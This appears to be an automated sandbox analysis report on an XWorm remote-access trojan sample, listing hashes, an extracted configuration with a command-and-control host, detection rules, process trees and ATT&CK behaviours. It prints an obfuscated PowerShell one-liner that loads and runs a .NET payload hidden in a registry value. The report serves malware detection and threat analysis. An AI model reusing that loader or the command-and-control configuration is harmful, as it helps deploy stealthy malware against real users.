Analysis
-
max time kernel
107s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
03/03/2025, 17:56
Static task
static1
Behavioral task
behavioral1
Sample
5.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
5.exe
Resource
win10v2004-20250217-en
General
-
Target
5.exe
-
Size
490KB
-
MD5
286b980a155209c4ef664687913b8113
-
SHA1
ae96bfe4b71d52ab46994c496d0c07ed2f28c5f3
-
SHA256
59b912dd8b99eb28efe1f30d84082baa5d2e09188c5f97ef1e19a043b245228c
-
SHA512
cae27348d906b5d4d7266492aae148e25d66124890d63fe03bafca86c83dbd362bc26a36d357fb07f4dbffa765e25c85aff9589c582812b43c106d05845bf611
-
SSDEEP
12288:Ozj3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sd:QkGTy
Malware Config
Extracted
xworm
3.1
again-stuff.gl.at.ply.gg:35361
w1O93T06AbTXm6Hz
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000b000000012280-5.dat family_xworm behavioral1/memory/844-8-0x0000000001280000-0x000000000128E000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2860 created 432 2860 powershell.EXE 5 -
Xworm family
-
Executes dropped EXE 4 IoCs
pid Process 844 DeadMmxq.exe 1652 DeadMmxq.exe 908 DeadR.exe 2496 DeadR.exe -
pid Process 2860 powershell.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2860 set thread context of 2940 2860 powershell.EXE 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeadR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeadR.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60422794658cdb01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2860 powershell.EXE 2860 powershell.EXE 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe 2940 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 2860 powershell.EXE Token: SeDebugPrivilege 2860 powershell.EXE Token: SeDebugPrivilege 2940 dllhost.exe Token: SeDebugPrivilege 844 DeadMmxq.exe Token: SeDebugPrivilege 1652 DeadMmxq.exe Token: SeDebugPrivilege 1652 DeadMmxq.exe Token: SeAuditPrivilege 856 svchost.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 800 wrote to memory of 844 800 5.exe 30 PID 800 wrote to memory of 844 800 5.exe 30 PID 800 wrote to memory of 844 800 5.exe 30 PID 800 wrote to memory of 1652 800 5.exe 31 PID 800 wrote to memory of 1652 800 5.exe 31 PID 800 wrote to memory of 1652 800 5.exe 31 PID 800 wrote to memory of 908 800 5.exe 32 PID 800 wrote to memory of 908 800 5.exe 32 PID 800 wrote to memory of 908 800 5.exe 32 PID 800 wrote to memory of 908 800 5.exe 32 PID 800 wrote to memory of 2496 800 5.exe 33 PID 800 wrote to memory of 2496 800 5.exe 33 PID 800 wrote to memory of 2496 800 5.exe 33 PID 800 wrote to memory of 2496 800 5.exe 33 PID 2864 wrote to memory of 2860 2864 taskeng.exe 35 PID 2864 wrote to memory of 2860 2864 taskeng.exe 35 PID 2864 wrote to memory of 2860 2864 taskeng.exe 35 PID 2860 wrote to memory of 2940 2860 powershell.EXE 37 PID 2860 wrote to memory of 2940 2860 powershell.EXE 37 PID 2860 wrote to memory of 2940 2860 powershell.EXE 37 PID 2860 wrote to memory of 2940 2860 powershell.EXE 37 PID 2860 wrote to memory of 2940 2860 powershell.EXE 37 PID 2860 wrote to memory of 2940 2860 powershell.EXE 37 PID 2860 wrote to memory of 2940 2860 powershell.EXE 37 PID 2860 wrote to memory of 2940 2860 powershell.EXE 37 PID 2860 wrote to memory of 2940 2860 powershell.EXE 37 PID 2940 wrote to memory of 432 2940 dllhost.exe 5 PID 2940 wrote to memory of 476 2940 dllhost.exe 6 PID 2940 wrote to memory of 492 2940 dllhost.exe 7 PID 2940 wrote to memory of 500 2940 dllhost.exe 8 PID 2940 wrote to memory of 592 2940 dllhost.exe 9 PID 2940 wrote to memory of 664 2940 dllhost.exe 10 PID 2940 wrote to memory of 756 2940 dllhost.exe 11 PID 2940 wrote to memory of 812 2940 dllhost.exe 12 PID 2940 wrote to memory of 856 2940 dllhost.exe 13 PID 2940 wrote to memory of 960 2940 dllhost.exe 15 PID 2940 wrote to memory of 276 2940 dllhost.exe 16 PID 2940 wrote to memory of 1040 2940 dllhost.exe 17 PID 2940 wrote to memory of 1048 2940 dllhost.exe 18 PID 2940 wrote to memory of 1096 2940 dllhost.exe 19 PID 2940 wrote to memory of 1124 2940 dllhost.exe 20 PID 2940 wrote to memory of 1176 2940 dllhost.exe 21 PID 2940 wrote to memory of 1216 2940 dllhost.exe 23 PID 2940 wrote to memory of 1580 2940 dllhost.exe 24 PID 2940 wrote to memory of 1796 2940 dllhost.exe 25 PID 2940 wrote to memory of 1648 2940 dllhost.exe 26 PID 2940 wrote to memory of 2520 2940 dllhost.exe 27 PID 2940 wrote to memory of 2864 2940 dllhost.exe 34
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0c7d40de-6a0a-482b-b6d4-5113ac9c5fed}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:592
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1580
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1796
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:664
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:756
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:812
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1096
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Windows\system32\taskeng.exetaskeng.exe {9220587C-279D-4A88-8F19-13534A69779B} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'D'+''+[Char](101)+''+[Char](97)+''+[Char](100)+'s'+'t'+'a'+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:960
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:276
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1040
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1048
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1124
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1216
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1648
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2520
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:492
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:500
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1176
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Users\Admin\AppData\Local\Temp\DeadMmxq.exe"C:\Users\Admin\AppData\Local\Temp\DeadMmxq.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:844
-
-
C:\Users\Admin\AppData\Local\Temp\DeadMmxq.exe"C:\Users\Admin\AppData\Local\Temp\DeadMmxq.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Users\Admin\AppData\Local\Temp\DeadR.exe"C:\Users\Admin\AppData\Local\Temp\DeadR.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:908
-
-
C:\Users\Admin\AppData\Local\Temp\DeadR.exe"C:\Users\Admin\AppData\Local\Temp\DeadR.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2496
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
31KB
MD54846c3d667fad5ac518196fbbd7edfb6
SHA145af67cf4f1b0fecd4311c73ad37052613e27344
SHA25602af5bf1358466c9c5189058e13a7d5860123ee2933a854ca528a8622d4bbf08
SHA51272f79e2a05c07db71bd1b5615a701bfa63e62c83d52a283df0ed087f5fa30eb909689d08973a8187e2b50250513efd2f85b8c1dac7637434334bee717647ab13
-
Filesize
151KB
MD5b8479a23c22cf6fc456e197939284069
SHA1b2d98cc291f16192a46f363d007e012d45c63300
SHA25618294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4